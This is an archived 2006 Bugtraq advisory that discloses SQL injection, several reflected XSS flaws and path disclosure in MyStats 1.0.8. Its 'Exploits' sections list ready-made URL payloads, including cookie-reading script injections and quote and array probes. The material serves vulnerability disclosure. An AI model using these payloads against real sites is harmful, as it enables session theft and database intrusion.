lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061112195253.9491.qmail@securityfocus.com>
Date: 12 Nov 2006 19:52:53 -0000
From: benjilenoob@...mail.com
To: bugtraq@...urityfocus.com
Subject: MyStats <=1.0.8 [injection sql, multiples xss, array & full path
 disclosure]

MyStats <=1.0.8 [injection sql, multiples xss, array & full path disclosure]
vendor site: http://emcity.nexenservices.com/mystats/index.php
product :MyStats 1.0.8
bug: injection sql, multiples xss, array & full path disclosure
risk : medium

[1/3] Connexion Variable XSS

Exploits:

mystats/mystats.php?connexion=<SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime
mystats/mystats.php?connexion="'/><SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime

[2/3] Details Variable Injection Sql, Full Path Disclosure, Array GET & XSS

Exploits:

mystats/mystats.php?details='
mystats/mystats.php?details[]=
mystats/mystats.php?details="'/><SCRIPT>alert(document.cookie)</SCRIPT>

[3/3] By Array GET & XSS

Exploit:

mystats/mystats.php?by[]=admin
mystats/mystats.php?connexion=2006-11-12&by="'/><SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime

[[ Security Access Point ]]

Gaffié Laurent & Mossé Benjamin
http://s-a-p.ca/
http://209.190.3.234/benjamin-mosse/
contact: saps.audit@...il.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ